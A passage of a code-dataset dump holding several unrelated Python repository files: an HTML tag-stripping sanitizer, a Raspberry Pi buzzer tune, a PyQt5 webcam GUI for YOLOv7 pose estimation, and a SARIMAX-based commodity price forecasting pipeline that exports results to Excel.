\": \"||[br/]||\",\n\t}\n\treturn d\n\ndef __encode_html_string(s):\n\td = __mapping_table()\n\tfor k, v in d.items():\n\t\ts = s.replace(k, v)\n\treturn s\n\ndef __decode_html_string(s):\n\td = __mapping_table()\n\tfor k, v in d.items():\n\t\ts = s.replace(v, k)\n\treturn s\n\ndef sanitize_html(html_str=\"\"):\n\tencoded_str = __encode_html_string(html_str)\n\tbs_str = BeautifulSoup(encoded_str, 'html.parser')\n\tbs_str = bs_str.getText()\n\tdecoded_str = __decode_html_string(bs_str)\n\treturn decoded_str\n\n","repo_name":"remaudcorentin-dev/python-simple-html-sanitize","sub_path":"simple_html_sanitizer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7818528824","text":"import RPi.GPIO as gpio\nimport time\npiano = list([330, 262, 196, 262, 294, 392 ,1,1, 294, 330, 294, 196, 262])\nbuzzer = 16\ngpio.setmode(gpio.BCM)\ngpio.setup(buzzer, gpio.OUT)\n\ndef play(pitch, sec):\n half_pitch = (1 / pitch) / 4\n t = int(pitch * sec)\n for i in range(t):\n gpio.output(buzzer, gpio.HIGH)\n time.sleep(half_pitch)\n gpio.output(buzzer, gpio.LOW)\n time.sleep(half_pitch)\ndef playSong(): \n for p in piano:\n play(p, 1)\n\n#playSong()\n\n","repo_name":"skywind121/ePaper_project","sub_path":"code/song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25192216891","text":"import sys\nimport cv2\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nfrom utils.datasets import letterbox\nfrom utils.torch_utils import select_device\nfrom models.experimental import attempt_load\nfrom utils.general import non_max_suppression_kpt, strip_optimizer\nfrom utils.plots import colors, plot_one_box_kpt\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nclass VideoWorker(QThread):\n changePixmap = pyqtSignal(QImage)\n\n def __init__(self, gui):\n super().__init__(gui)\n self.gui = gui\n self.stop_signal = False\n\n @torch.no_grad()\n def run(self):\n weights=\"yolov7-w6-pose.pt\"\n device = select_device(\"0\") #select device\n\n strip_optimizer(\"0\", \"yolov7-w6-pose.pt\")\n\n model = attempt_load(weights, map_location=device) #Load model\n model.eval()\n names = model.module.names if hasattr(model, \"module\") else model.names # get class names\n cap = cv2.VideoCapture(0) #pass video to videocapture object\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.gui.cam_width)\n while True:\n ret, frame = cap.read() #get frame and success from video capture\n if ret is False: #if success is true, means frame exist\n break\n dst = cv2.resize(frame, dsize=(self.gui.cam_width, self.gui.cam_height), interpolation=cv2.INTER_AREA)\n inp = cv2.resize(frame, (640, int((640*self.gui.cam_height)/self.gui.cam_width)))\n inp = cv2.cvtColor(inp, cv2.COLOR_BGR2RGB) #convert frame to RGB\n inp = letterbox(inp, (self.gui.cam_width), stride=64, auto=True)[0]\n inp = transforms.ToTensor()(inp)\n inp = torch.tensor(np.array([inp.numpy()]))\n inp = inp.to(device) #convert inp data to device\n inp = inp.float() #convert inp to float precision (cpu)\n with torch.no_grad(): #get predictions\n output_data, _ = model(inp)\n output_data = non_max_suppression_kpt(\n output_data,\n 0.25, # Conf. Threshold.\n 0.65, # IoU Threshold.\n nc=model.yaml[\"nc\"], # Number of classes.\n nkpt=model.yaml[\"nkpt\"], # Number of keypoints.\n kpt_label=True)\n \n # for pose in output_data: # detections per img\n # for det_index, (*xyxy, conf, cls) in enumerate(reversed(pose[:,:6])): #loop over poses for drawing on frame\n # c = int(cls) # integer class\n # kpts = pose[det_index, 6:]\n # label = f\"{names[c]} {conf:.2f}\"\n # plot_one_box_kpt(xyxy, dst, label=label, color=colors(c, True), \n # line_thickness=6, kpt_label=True, kpts=kpts, steps=3, \n # orig_shape=dst.shape[:2])\n for det in output_data[0]:\n if det[4] < 0.5:\n continue\n for i in range(len(det)):\n if i in [6, 9, 12, 15, 18, 21, 24, 27, 30, 33, 36, 39, 42, 45, 48, 51, 54]:\n dst = cv2.circle(dst, (int(det[i]), int(det[i+1])), 3, (0, 255, 0), -1, cv2.LINE_AA)\n dst = cv2.putText(dst, \"{:.2f}\".format(det[i+2].item()), (int(det[i]+5), int(det[i+1]-4)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 1, cv2.LINE_AA)\n\n rgbImage = cv2.cvtColor(dst, cv2.COLOR_BGR2RGB)\n convertToQtFormat = QImage(rgbImage.data, rgbImage.shape[1], rgbImage.shape[0], QImage.Format_RGB888)\n p = convertToQtFormat.scaled(self.gui.cam_width, self.gui.cam_height, Qt.KeepAspectRatio)\n self.changePixmap.emit(p)\n \n if self.stop_signal:\n self.gui.label.setText(\"no image\")\n break\n cap.release()\n\nclass App(QWidget):\n def __init__(self):\n super().__init__()\n self.width = 1600\n self.height = 900\n self.cam_width = 1280\n self.cam_height = 720\n self.start()\n\n def start(self):\n self.setWindowTitle(\"ANGEL X\")\n self.move(0, 0)\n self.resize(self.width, self.height)\n\n self.cb = QComboBox(self)\n self.cb.addItem(\"구동기 모드 선택\")\n self.cb.addItem(\"Squat\")\n self.cb.addItem(\"Stoop\")\n self.cb.addItem(\"Heavy Load\")\n self.cb.activated[str].connect(self.onSelectChanged)\n self.cb.setStyleSheet(\"QComboBox { max-width:200px; }\")\n\n btn_rec = QPushButton(self)\n btn_rec.setText(\"REC\")\n btn_rec.setStyleSheet(\"QPushButton { max-width:100px; }\")\n self.btn_rec_state = False\n\n grid = QGridLayout()\n self.setLayout(grid)\n grid.addWidget(self.cb, 0, 0)\n grid.addWidget(btn_rec, 0, 1)\n btn_rec.clicked.connect(self.onRecClicked)\n\n self.label = QLabel(self)\n self.label.setText(\"no image\")\n self.label.resize(self.cam_width, self.cam_height)\n grid.addWidget(self.label, 1, 0, 1, 2)\n\n self.center()\n self.show()\n\n def onSelectChanged(self, text):\n pass\n\n def onRecClicked(self):\n if self.cb.currentText() == \"구동기 모드 선택\":\n QMessageBox.about(self, \"Error\", \"구동기 모드를 선택해주세요.\")\n return\n \n if self.btn_rec_state == True:\n self.btn_rec_state = False\n self.video_worker.stop_signal = True\n self.video_worker.quit()\n self.video_worker.wait(500)\n return\n\n self.btn_rec_state = True\n self.video_worker = VideoWorker(self)\n self.video_worker.changePixmap.connect(self.showImage)\n try:\n self.video_worker.start()\n except:\n self.video_worker.quit()\n self.video_worker.wait(500)\n\n def showImage(self, image):\n self.label.setPixmap(QPixmap.fromImage(image))\n\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())","repo_name":"hrdkdh/pose_estimation","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"5866966341","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 6 10:07:55 2020\r\n\r\n@author: hmusugu\r\n\"\"\"\r\n\r\n#SARIMA Modelling Univiate\r\n\r\n\r\nfrom datetime import datetime\r\nfrom openpyxl import load_workbook\r\nfrom dateutil.relativedelta import relativedelta\r\nimport warnings\r\nimport itertools\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nwarnings.filterwarnings(\"ignore\")\r\nplt.style.use('fivethirtyeight')\r\nimport pandas as pd\r\nimport statsmodels.api as sm\r\nfrom statsmodels.tsa.stattools import adfuller\r\nfrom statsmodels.tsa.stattools import kpss\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.metrics import r2_score\r\nimport sqlalchemy as db\r\nfrom sqlalchemy import create_engine\r\nimport os\r\nfrom sqlalchemy import create_engine, MetaData\r\nimport StationarityTests\r\nimport StationarizeSeries\r\nfrom scipy.stats import pearsonr\r\nfrom scipy.stats import spearmanr\r\nfrom scipy.stats import kstest, shapiro\r\nfrom pandas import DataFrame\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.feature_selection import RFE\r\nfrom matplotlib import pyplot\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n\r\n#Importing input files\r\ndef import_files():\r\n df = pd.read_excel(\"Styrene_PS_Input_Data_20200914 v2.xlsx\", sheet_name=\"endog\", index_col = \"date\")\r\n exog_var = pd.read_excel(\"Styrene_PS_Input_Data_20200914 v2.xlsx\",sheet_name=\"exog\",index_col = \"date\")\r\n #full_data1 = exog_var.iloc[:52, 5:8]\r\n #df['date'] = pd.to_datetime(df['date'], errors='coerce')\r\n #df = df.asfreq(freq = 'B')\r\n #df = df.groupby(df.index).mean()\r\n return df, exog_var\r\n\r\n'''\r\n#Needs to be built-in\r\ndef train_test(index1,index2):\r\n #tra = df.iloc[0:31,index1:index2]\r\n #tes = df.iloc[30:36,index1:index2]\r\n ful = df.iloc[0:40,index1:index2]\r\n return ful\r\n'''\r\n#Stationarizer func to stationarize non-stationary exog variables\r\ndef Stationarizer(data1):\r\n data1 = data1.dropna()\r\n sTest = StationarityTests.StationarityTests()\r\n results2 = StationarityTests.RunTests(sTest, data1)\r\n \r\n nonStationaryData = False\r\n df_Stnry = pd.DataFrame()\r\n for k in results2.items():\r\n isStationary = False\r\n isStationaryADF = False\r\n isStationaryKPSS = False\r\n columns = k[1].items()\r\n for j in columns:\r\n testStats = j[1]\r\n for t in testStats:\r\n testType = t[0]\r\n if testType == 'ADF':\r\n isStationaryADF = t[1]\r\n elif testType == 'KPSS':\r\n isStationaryKPSS = t[1]\r\n elif testType == 'isStationary':\r\n isStationary = t[1]\r\n if not isStationary:\r\n df_Stnry[k[0]] = StationarizeSeries.differenceSeries(k[0], data1, sTest)\r\n nonStationaryData = True\r\n else:\r\n df_Stnry[k[0]] = data1[k[0]]\r\n return df_Stnry, nonStationaryData\r\n\r\n#Func for creating lag columns\r\ndef create_lagged_columns(df_Stnry,exog_name):\r\n # load dataset\r\n series = df_Stnry[exog_name]\r\n dataframe = DataFrame()\r\n for i in range(12,0,-1):\r\n \tdataframe['t-'+str(i)] = series.shift(i)\r\n dataframe['t'] = series.values\r\n dataframe = dataframe[12:]\r\n return dataframe\r\n\r\n#Correlation Tests (Pearson and Spearman)\r\ndef corr_tests(lag_columns,endog_var1):\r\n #Pearson\r\n p_coef = []\r\n for i1 in lag_columns.columns:\r\n corr, _ = pearsonr(endog_var1, lag_columns[i1])\r\n p_coef.append(corr)\r\n max_p_coef = max(p_coef)\r\n for i2 in range(len(p_coef)):\r\n if p_coef[i2] == max_p_coef:\r\n corr_column1 = lag_columns.columns[i2]\r\n \r\n #Spearman\r\n s_coef = []\r\n for i3 in lag_columns.columns:\r\n corr, _ = spearmanr(endog_var1, lag_columns[i3])\r\n s_coef.append(corr)\r\n max_s_coef = max(s_coef)\r\n for i4 in range(len(s_coef)):\r\n if s_coef[i4] == max_s_coef:\r\n corr_column2 = lag_columns.columns[i4]\r\n #Which column to take\r\n if corr_column1 == corr_column2:\r\n corr_column = corr_column1\r\n return corr_column\r\n else:\r\n if shapiro(lag_columns[corr_column1])[1]>0.05:\r\n return (corr_column1)\r\n else: return (corr_column2)\r\n\r\n\r\n\r\n#Feature Importance/ Feature Selection\r\ndef Random_Forest_regressor(df_ex_en):\r\n array = df_ex_en.values\r\n X = array[:,1:]\r\n y = array[:,0]\r\n \r\n model = RandomForestRegressor(n_estimators=500, random_state=1)\r\n model.fit(X, y)\r\n # show importance scores to choose components that explain 80% of variance \r\n # plot importance scores\r\n names = df_ex_en.columns.values[1:]\r\n ticks = [i for i in range(len(names))]\r\n pyplot.bar(ticks, model.feature_importances_)\r\n pyplot.xticks(ticks, names)\r\n pyplot.show()\r\n \r\n imp_col_dict = dict()\r\n for k3 in range(len(names)):\r\n imp_col_dict[names[k3]] = model.feature_importances_[k3]\r\n sort_orders = sorted(imp_col_dict.items(), key=lambda x: x[1], reverse=True)\r\n imp_col_name = []\r\n var_val = []\r\n for i in sort_orders:\r\n imp_col_name.append(i[0])\r\n var_val.append(i[1])\r\n \r\n imp_col_final = []\r\n c=0\r\n for k4 in range(len(var_val)):\r\n c = c + var_val[k4]\r\n imp_col_final.append(imp_col_name[k4])\r\n if c >=0.85:\r\n break\r\n else:\r\n continue\r\n \r\n return imp_col_final, var_val, imp_col_name\r\n\r\n \r\n \r\n#Func for uni-var training\r\ndef model(data):\r\n p = d = q = range(0, 2)\r\n pdq = list(itertools.product(p, d, q))\r\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\r\n AIC = []\r\n PDQ=[]\r\n S_PDQ = []\r\n for param in pdq:\r\n for param_seasonal in seasonal_pdq:\r\n try:\r\n mod = sm.tsa.statespace.SARIMAX(endog = data,\r\n order=param,\r\n seasonal_order=param_seasonal,\r\n enforce_stationarity=False,\r\n enforce_invertibility=False)\r\n results = mod.fit()\r\n AIC.append(results.aic)\r\n PDQ.append(param)\r\n S_PDQ.append(param_seasonal)\r\n print('ARIMA{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))\r\n except:\r\n continue\r\n #AIC = AIC\r\n min_AIC = min(AIC)\r\n for a1 in range(len(AIC)):\r\n if (AIC[a1]==min_AIC):\r\n min_index = a1\r\n \r\n opt_PDQ = PDQ[min_index]\r\n opt_S_PDQ = S_PDQ[min_index]\r\n p,d,q=opt_PDQ[0],opt_PDQ[1],opt_PDQ[2]\r\n P,D,Q=opt_S_PDQ[0],opt_S_PDQ[1],opt_S_PDQ[2]\r\n \r\n #def run_model(): '''Make sure to include time stamps so that we know the run-time'''\r\n mod = sm.tsa.statespace.SARIMAX(data,\r\n order=(p, d, q),\r\n seasonal_order=(P, D, Q, 12),enforce_stationarity=False,enforce_invertibility=False)\r\n res = mod.fit()\r\n print(res.summary().tables[1])\r\n return res\r\n\r\n\r\n#Func for multivariate training:\r\ndef mult_var_model(endog_data, exog_data):\r\n p = d = q = range(0, 2)\r\n pdq = list(itertools.product(p, d, q))\r\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\r\n \r\n AIC = []\r\n PDQ=[]\r\n S_PDQ = []\r\n for param in pdq:\r\n for param_seasonal in seasonal_pdq:\r\n try:\r\n mod = sm.tsa.statespace.SARIMAX(endog = endog_data,\r\n order=param,\r\n seasonal_order=param_seasonal,\r\n enforce_stationarity=True,\r\n enforce_invertibility=True, exog = exog_data)\r\n results = mod.fit()\r\n AIC.append(results.aic)\r\n PDQ.append(param)\r\n S_PDQ.append(param_seasonal)\r\n print('SARIMAX{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))\r\n except:\r\n continue\r\n #Choosing model with min AIC\r\n min_AIC = min(AIC)\r\n for a1 in range(len(AIC)):\r\n if (AIC[a1]==min_AIC):\r\n min_index = a1\r\n \r\n opt_PDQ = PDQ[min_index]\r\n opt_S_PDQ = S_PDQ[min_index]\r\n return opt_PDQ,opt_S_PDQ\r\n\r\ndef run_mul_model(opt_pdqs,opt_S_PDQS,endog_data, exog_data):\r\n p,d,q=opt_pdqs[0],opt_pdqs[1],opt_pdqs[2]\r\n P,D,Q=opt_S_PDQS[0],opt_S_PDQS[1],opt_S_PDQS[2]\r\n model = sm.tsa.statespace.SARIMAX(endog_data,\r\n order=(p, d, q),\r\n seasonal_order=(P, D, Q, 12),enforce_stationarity=True,enforce_invertibility=True,exog = exog_data)\r\n res = model.fit()\r\n print(res.summary().tables[1])\r\n return res\r\n\r\n#Function to invert first order differencing\r\ndef inverter(diff_val,orig_data):\r\n inv = []\r\n c = orig_data.iloc[-len(diff_val)-1]\r\n for k6 in range(len(diff_val)):\r\n c = c + diff_val[k6]\r\n inv.append(c)\r\n return inv\r\n\r\n#Performance metrics\r\ndef forecast_accuracy(forecast, actual):\r\n mape = np.mean(np.abs(forecast - actual)/np.abs(actual)) # MAPE\r\n me = np.mean(forecast - actual) # ME\r\n mae = np.mean(np.abs(forecast - actual)) # MAE\r\n mpe = np.mean((forecast - actual)/actual) # MPE\r\n rmse = np.mean((forecast - actual)**2)**.5 # RMSE\r\n corr = np.corrcoef(forecast, actual)[0,1] # corr\r\n mins = np.amin(np.hstack([forecast[:,None], \r\n actual[:,None]]), axis=1)\r\n maxs = np.amax(np.hstack([forecast[:,None], \r\n actual[:,None]]), axis=1)\r\n minmax = 1 - np.mean(mins/maxs) # minmax\r\n return({'mape':mape, 'me':me, 'mae': mae, \r\n 'mpe': mpe, 'rmse':rmse, 'corr':corr, 'minmax':minmax})\r\n\r\n\r\ndef normalize(series):\r\n series = pd.DataFrame(series)\r\n values = series.values\r\n #values = values.reshape((len(values),np.shape(series)[1]))\r\n scaler = StandardScaler()\r\n scaler = scaler.fit(values)\r\n normalized = scaler.transform(values)\r\n inversed = scaler.inverse_transform(normalized)\r\n return inversed, normalized, scaler\r\n \r\n\r\n \r\n\r\n\r\n#Main\r\n \r\n#Import data\r\ndf_endog, df_exog= import_files()\r\n\r\n\r\n\r\n\r\n#Need to Make this generic for all material types***********************************\r\ndf_type_endog = dict(tuple(df_endog.groupby('material')))\r\ndf_type_exog = dict(tuple(df_exog.groupby('material')))\r\ntyp_list =tuple(df_endog.groupby('material'))\r\n\r\n\r\nendog_type_dict = {}\r\nfor number in range(len(df_type_endog)):\r\n endog_type_dict[\"endog_typ%s\" %number] = df_type_endog[typ_list[number][0]]\r\n\r\nexog_type_dict = {}\r\nfor number in range(len(df_type_exog)):\r\n exog_type_dict[\"exog_typ%s\" %number] = df_type_exog[typ_list[number][0]]\r\n\r\n\r\nout_df_list = []\r\nout_df_list1 = []\r\nperf_list = []\r\nfor q1 in range(len(endog_type_dict)):\r\n for q2 in range(len(exog_type_dict)):\r\n if (list(endog_type_dict.keys())[0][-1] == list(exog_type_dict.keys())[0][-1]):\r\n endog_typ = endog_type_dict[list(endog_type_dict.keys())[1]]\r\n exog_typ = exog_type_dict[list(exog_type_dict.keys())[1]]\r\n exog_typ= exog_typ.dropna(axis=1, how='all')\r\n exog_typ = exog_typ.drop(['material', 'year','month'], axis = 1)\r\n exog_typ = exog_typ.dropna()\r\n exog_backup = exog_typ\r\n \r\n endog_var = endog_typ['cost_per_unit'].dropna()\r\n # Normalize Endog \r\n endog_orig, endog_norm, sca_endog = normalize(endog_var)\r\n \r\n endog_var = pd.DataFrame(endog_var)\r\n endog_var['cost_per_unit'] = endog_norm\r\n endog_var = endog_var.T.iloc[0]\r\n \r\n # Normalize Exog \r\n exog_orig, exog_norm, sca_exog = normalize(exog_typ)\r\n \r\n #exog_var = pd.DataFrame(exog_var)\r\n \r\n exog_typ1 = pd.DataFrame(exog_norm)\r\n exog_typ1.index = exog_typ.index\r\n exog_typ1.columns = exog_typ.columns\r\n exog_typ = exog_typ1\r\n \r\n #Stationarizing Endog\r\n endog_var_df = endog_var.to_frame()\r\n endog_stationarized,nonStationaryData = Stationarizer(endog_var_df)\r\n endog_final = endog_stationarized['cost_per_unit']['2017-02-01':]\r\n \r\n #Stationarize exog\r\n df_stationarized, nonStationaryData = Stationarizer(exog_typ)\r\n df_stationarized = df_stationarized.dropna()\r\n\r\n #Taking optimal lag columns using Pearson and Spearmen Co-eff. \r\n selected_lag_col = []\r\n exog_final1 = pd.DataFrame()\r\n for k1 in df_stationarized.columns:\r\n print (k1)\r\n df_lagged_columns = create_lagged_columns(df_stationarized, k1)\r\n df_lagged_columns = df_lagged_columns[:'2020-08-01']\r\n #selected_lag_col.append(k1+'_'+corr_tests(df_lagged_columns,endog_final))\r\n lag_name = corr_tests(df_lagged_columns,endog_final)\r\n exog_final1[k1+'_'+corr_tests(df_lagged_columns,endog_final)] = df_lagged_columns[lag_name]\r\n \r\n df_ex_en1 = pd.DataFrame()\r\n df_ex_en1['cost_per_unit'] = endog_final\r\n for k2 in exog_final1.columns:\r\n df_ex_en1[k2] = exog_final1[k2] \r\n #df_typ2 = df_type['Styr[]ene']\r\n \r\n #Taking columns selected by Feature Selection \r\n feature_selected_col, var_val, col_name = Random_Forest_regressor(df_ex_en1)\r\n exog_final2 = pd.DataFrame()\r\n for k5 in feature_selected_col:\r\n exog_final2[k5] = df_ex_en1[k5]\r\n \r\n #Storing color for selected columns:\r\n clean_col_name = []\r\n for m2 in range(len(col_name)):\r\n clean_col_name.append(col_name[m2][:col_name[m2].find('_')]) \r\n color = []\r\n for m1 in col_name:\r\n if m1 in feature_selected_col:\r\n color.append('green')\r\n else:color.append('red')\r\n \r\n #Dataframe for feature Selection Criterion\r\n fs = pd.DataFrame()\r\n fs['Index Type'] = clean_col_name\r\n fs['Variance'] = var_val\r\n fs['color'] = color\r\n \r\n \r\n #Forecasting exogs with optimal lags using univariate analysis\r\n res_dict = dict()\r\n for k7 in exog_final2.columns:\r\n res_dict['res_'+k7] = model(exog_final2[k7])\r\n \r\n pred_uni_exog =pd.DataFrame()\r\n for k8 in range(len(res_dict)):\r\n pred_uni_exog[list(res_dict.keys())[k8][4:]] = list(res_dict.values())[k8].forecast(14)\r\n \r\n #Creating exog_old to normalize it so that we can de-normalize the array with selected columns\r\n exog_old = pd.DataFrame()\r\n #original data with selected columns\r\n for s1 in range(len(exog_final2.columns)):\r\n exog_old[exog_final2.columns[s1][:exog_final2.columns[s1].find('_')]] = exog_backup[exog_final2.columns[s1][:exog_final2.columns[s1].find('_')]]\r\n \r\n #normalizing exog_old\r\n exog_orig_old, exog_norm_old, sca_exog_old = normalize(exog_old)\r\n \r\n #Adding column names and index to exog_old\r\n exog_old1 = pd.DataFrame(exog_norm_old)\r\n exog_old1.index = exog_old.index\r\n exog_old1.columns = exog_old.columns\r\n exog_old = exog_old1\r\n \r\n \r\n #Forecasting orginal exogs using univariate analysis (Needs to refined)************************************\r\n res_dict2 = dict()\r\n for k9 in exog_old.columns:\r\n res_dict2['res_'+k9] = model(exog_old[k9])\r\n #exog forecasts\r\n pred_uni_exog2 =pd.DataFrame()\r\n for k10 in range(len(res_dict)):\r\n pred_uni_exog2[list(res_dict2.keys())[k10][4:]] = list(res_dict2.values())[k10].forecast(14)\r\n \r\n \r\n #de-normalizing\r\n pred_uni_exog_norm = sca_exog_old.inverse_transform(pred_uni_exog2.values)\r\n pred_uni_exog_norm= pd.DataFrame(pred_uni_exog_norm)\r\n pred_uni_exog_norm.index = pred_uni_exog2.index\r\n pred_uni_exog_norm.columns = pred_uni_exog2.columns\r\n pred_uni_exog2 = pred_uni_exog_norm\r\n \r\n #x = sca_exog.inverse_transform(pred_uni_exog2.values)\r\n \r\n \r\n #exog in-samp predictions\r\n pred_uni_exog_insamp =pd.DataFrame()\r\n for k10 in range(len(res_dict)):\r\n pred_uni_exog_insamp[list(res_dict2.keys())[k10][4:]] = list(res_dict2.values())[k10].predict(start=pd.to_datetime('2016-01-01'), dynamic=False) #Starting date of exog_tup\r\n # Filling 1st values with orig values\r\n for k11 in exog_old.columns:\r\n pred_uni_exog_insamp[k11][0] = exog_old[k11][0]\r\n \r\n #de-normalizing\r\n pred_uni_exog_insamp_norm = sca_exog_old.inverse_transform(pred_uni_exog_insamp.values)\r\n pred_uni_exog_insamp_norm= pd.DataFrame(pred_uni_exog_insamp_norm)\r\n pred_uni_exog_insamp_norm.index = pred_uni_exog_insamp.index\r\n pred_uni_exog_insamp_norm.columns = pred_uni_exog_insamp.columns\r\n pred_uni_exog_insamp = pred_uni_exog_insamp_norm\r\n \r\n \r\n exog_typ2 = pd.DataFrame(exog_orig_old)\r\n exog_typ2.index = exog_old.index\r\n exog_typ2.columns = exog_old.columns\r\n exog_typ = exog_typ2\r\n \r\n \r\n out_df_list2 = []\r\n for k12 in exog_typ.columns:\r\n output_df2 = pd.DataFrame()\r\n output_df2['Index_price'] = exog_typ[k12]\r\n output_df2['Adjusted_Index_price'] = pred_uni_exog_insamp[k12]\r\n \r\n forecast_df2 = pd.DataFrame()\r\n forecast_df2['Forecasted_Index_price'] = pred_uni_exog2[k12]\r\n \r\n out2 = pd.concat([output_df2,forecast_df2])\r\n out2['Forecasted_Index_price'][output_df2.index[-1]] = output_df2['Adjusted_Index_price'][output_df2.index[-1]]\r\n out2['Material Type'] = endog_typ['material'][0]\r\n out2['Index Type'] = k12\r\n \r\n out_df_list2.append(out2)\r\n \r\n exog_price_forecasts = pd.DataFrame()\r\n exog_price_forecasts = pd.concat(out_df_list2)\r\n \r\n out_df_list1.append(exog_price_forecasts)\r\n \r\n #Split data train, test and future. Needs to be made generic******************************\r\n en_train = endog_final[:'2019-09-01']\r\n ex_train = exog_final2[:'2019-09-01']\r\n \r\n en_test = endog_final['2019-10-01':]\r\n ex_test = exog_final2['2019-10-01':]\r\n \r\n ex_fut = pred_uni_exog\r\n \r\n #Train model on train data\r\n pdq_tra, PDQ1_tra = mult_var_model(en_train, ex_train)\r\n \r\n res_tra = run_mul_model(pdq_tra, PDQ1_tra, en_train, ex_train)\r\n \r\n #Out-of-sample predictions and Model Performance Evaluation (using test data)\r\n pred_test = res_tra.predict(start=res_tra.nobs, end=res_tra.nobs + (len(ex_test)-1), exog = ex_test, dynamic = True) \r\n \r\n pred_test_inv = inverter(pred_test, endog_var)\r\n en_test_inv = inverter(en_test, endog_var)\r\n \r\n pred_test_inv = np.array(pred_test_inv)\r\n en_test_inv = np.array(en_test_inv)\r\n \r\n \r\n #de-normalizing\r\n pred_test_inv = sca_endog.inverse_transform(pred_test_inv)\r\n en_test_inv = sca_endog.inverse_transform(en_test_inv)\r\n \r\n \r\n perf_metrics=forecast_accuracy(pred_test_inv, en_test_inv)\r\n perf = pd.DataFrame(perf_metrics, index = range(0,1))\r\n perf['Material Type'] = endog_typ['material'][0]\r\n \r\n perf_list.append(perf)\r\n \r\n \r\n plt.plot(pred_test_inv)\r\n plt.plot(en_test_inv)\r\n \r\n #Train model on Full data\r\n #res_ful, pdq,P_D_Q = mult_var_model(endog_final, exog_final2) \r\n res_ful = run_mul_model(pdq_tra, PDQ1_tra, endog_final, exog_final2)\r\n #In-sample predictions:\r\n #pred1 = res_ful.get_prediction(start=pd.to_datetime('2017-02-01'), dynamic=False) #2nd date from endog start\r\n #pred1.conf_int()\r\n pred1 = res_ful.predict(start=pd.to_datetime('2017-02-01'), exog = exog_final2, dynamic=False) \r\n pred_in_samp = pred1 #( originally pred1.predicted )\r\n\r\n \r\n pred_in_samp_inv= []\r\n var_c1 = endog_var.iloc[-1]\r\n for k10 in range(len(pred_in_samp)):\r\n var_c1 = var_c1 + pred_in_samp[k10]\r\n pred_in_samp_inv.append(var_c1)\r\n \r\n \r\n pred_in_samp_inv = [endog_var[0]] + pred_in_samp_inv\r\n pred_in_samp_inv = sca_endog.inverse_transform(pred_in_samp_inv)\r\n #Out-of-sample predictions\r\n pred_fut = res_ful.predict(start=res_ful.nobs, end=res_ful.nobs + (len(ex_fut)-1), exog = ex_fut, dynamic = False) \r\n \r\n pred_fut_inv= []\r\n var_c = endog_var.iloc[-1]\r\n for k9 in range(len(pred_fut)):\r\n var_c = var_c + pred_fut[k9]\r\n pred_fut_inv.append(var_c)\r\n \r\n #denormalizing\r\n pred_fut_inv = sca_endog.inverse_transform(pred_fut_inv)\r\n \r\n plt.plot(pred_fut_inv)\r\n \r\n output_df = pd.DataFrame()\r\n output_df['Material Type']= endog_typ['material']\r\n #output_df.index = list(endog_typ.index) + fut_index[1:]\r\n #output_df['Commodity Adjusted Price'] = forecast_df['preds']\r\n output_df['Commodity Price'] = endog_typ['cost_per_unit']\r\n output_df['Adjusted Commodity Price'] = pd.Series(pred_in_samp_inv, index = output_df.index)\r\n \r\n #output_df['Commodity Adjusted Price']['2019-04-01':] = pred_fut_inv\r\n \r\n fut_index=[]\r\n for q3 in range(15):\r\n fut_index.append(endog_typ.index[-1]+ relativedelta(months=+q3))\r\n \r\n forecast_df = pd.DataFrame()\r\n forecast_df['Forecasted Commodity Price'] = pred_fut_inv\r\n forecast_df['Material Type'] = endog_typ['material'][0]\r\n forecast_df.index= fut_index[1:]\r\n \r\n out1 = pd.concat([output_df, forecast_df])\r\n out1['Forecasted Commodity Price'][endog_typ.index[-1]] = endog_typ['cost_per_unit'][endog_typ.index[-1]]\r\n out_df_list.append(out1)\r\n\r\npath = r\"C:\\Users\\hmusugu\\Desktop\\Molex\\CogForecasting\\MVA\\Output_test_PA66.xlsx\"\r\ncomm_price_forecasts = pd.DataFrame()\r\ncomm_price_forecasts = pd.concat(out_df_list)\r\n\r\nindex_price_forecasts = pd.DataFrame()\r\nindex_price_forecasts = pd.concat(out_df_list1)\r\n\r\nperf_df = pd.DataFrame()\r\nperf_df = pd.concat(perf_list)\r\n\r\n#Are we using this?\r\n#pred_uni_exog2.to_excel(\"ADAPT_Data_Source_20200817 v9.xlsx\",sheet_name = endog_typ['material'][0])\r\n\r\n\r\nbook = load_workbook(path)\r\nwriter = pd.ExcelWriter(path, engine = 'openpyxl')\r\nwriter.book = book\r\n\r\ncomm_price_forecasts.to_excel(writer, sheet_name = 'commodity_forecast_data')\r\nindex_price_forecasts.to_excel(writer, sheet_name = 'index_forecast_data')\r\nperf_df.to_excel(writer, sheet_name = 'perf_metrics')\r\nfs.to_excel(writer, sheet_name = 'Feature Selection')\r\nwriter.save()\r\nwriter.close()\r\n \r\n\r\n\r\n","repo_name":"hmusugu/Projects","sub_path":"Python 